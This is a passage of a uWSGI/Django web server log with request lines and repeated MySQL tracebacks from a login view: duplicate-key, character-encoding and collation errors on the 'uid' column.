_save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '111' for key 'uid'") +[pid: 2069|app: 0|req: 672/869] 180.160.72.163 () {48 vars in 1137 bytes} [Thu Jan 14 08:29:08 2021] POST /login/ => generated 208322 bytes in 107 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 673/870] 114.87.230.234 () {40 vars in 1010 bytes} [Thu Jan 14 08:29:09 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/871] 114.87.230.234 () {42 vars in 1038 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/872] 114.87.230.234 () {42 vars in 1016 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/873] 114.87.230.234 () {42 vars in 1020 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/874] 114.87.230.234 () {42 vars in 1018 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/875] 114.87.230.234 () {42 vars in 1024 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/876] 114.87.230.234 () {42 vars in 999 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/877] 114.87.230.234 () {42 vars in 997 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/878] 114.87.230.234 () {42 vars in 1015 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/879] 114.87.230.234 () {42 vars in 1013 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/880] 114.87.230.234 () {42 vars in 1005 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/881] 114.87.230.234 () {42 vars in 1056 bytes} [Thu Jan 14 08:29:10 2021] GET /static/img/favicon.ico => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: 0|req: 674/882] 180.160.72.163 () {48 vars in 1115 bytes} [Thu Jan 14 08:29:19 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 675/883] 180.160.72.163 () {42 vars in 1100 bytes} [Thu Jan 14 08:29:19 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 676/884] 180.160.72.163 () {42 vars in 1102 bytes} [Thu Jan 14 08:29:19 2021] GET /home/ => generated 7487 bytes in 9 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 677/885] 180.160.72.163 () {48 vars in 1137 bytes} [Thu Jan 14 08:29:25 2021] POST /login/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 678/886] 180.160.72.163 () {42 vars in 1116 bytes} [Thu Jan 14 08:29:26 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 679/887] 180.160.72.163 () {42 vars in 1118 bytes} [Thu Jan 14 08:29:26 2021] GET /home/ => generated 7487 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 680/888] 180.160.72.163 () {40 vars in 1070 bytes} [Thu Jan 14 08:29:30 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 681/889] 180.160.72.163 () {48 vars in 1181 bytes} [Thu Jan 14 08:29:36 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 682/890] 180.160.72.163 () {42 vars in 1105 bytes} [Thu Jan 14 08:29:42 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 683/891] 180.160.72.163 () {42 vars in 1107 bytes} [Thu Jan 14 08:29:42 2021] GET /publish/ => generated 4577 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 684/892] 180.160.72.163 () {48 vars in 1181 bytes} [Thu Jan 14 08:29:47 2021] POST /login/ => generated 27 bytes in 26 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 685/893] 180.160.72.163 () {42 vars in 1118 bytes} [Thu Jan 14 08:29:47 2021] GET /home/ => generated 7490 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +Not Found: / +[pid: 2069|app: 0|req: 686/894] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 08:29:58 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 687/895] 180.160.72.163 () {38 vars in 864 bytes} [Thu Jan 14 08:31:08 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/896] 180.160.72.163 () {40 vars in 847 bytes} [Thu Jan 14 08:31:08 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/897] 180.160.72.163 () {40 vars in 863 bytes} [Thu Jan 14 08:31:08 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 688/898] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:31:29 2021] POST /login/ => generated 209756 bytes in 142 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 689/899] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:31:36 2021] POST /login/ => generated 209756 bytes in 126 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 690/900] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:31:38 2021] POST /login/ => generated 183257 bytes in 118 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 691/901] 180.160.72.163 () {38 vars in 782 bytes} [Thu Jan 14 08:31:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/902] 180.160.72.163 () {40 vars in 771 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/903] 180.160.72.163 () {40 vars in 793 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/904] 180.160.72.163 () {40 vars in 775 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/905] 180.160.72.163 () {40 vars in 773 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/906] 180.160.72.163 () {40 vars in 779 bytes} [Thu Jan 14 08:31:52 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/907] 180.160.72.163 () {40 vars in 754 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/908] 180.160.72.163 () {40 vars in 752 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/909] 180.160.72.163 () {40 vars in 760 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/910] 180.160.72.163 () {40 vars in 770 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/911] 180.160.72.163 () {40 vars in 766 bytes} [Thu Jan 14 08:31:52 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/912] 180.160.72.163 () {40 vars in 823 bytes} [Thu Jan 14 08:31:52 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 692/913] 180.160.72.163 () {40 vars in 834 bytes} [Thu Jan 14 08:31:56 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 693/914] 180.160.72.163 () {40 vars in 837 bytes} [Thu Jan 14 08:31:56 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 2069|app: 0|req: 694/915] 180.160.72.163 () {38 vars in 724 bytes} [Thu Jan 14 08:31:56 2021] GET /favicon.ico => generated 3480 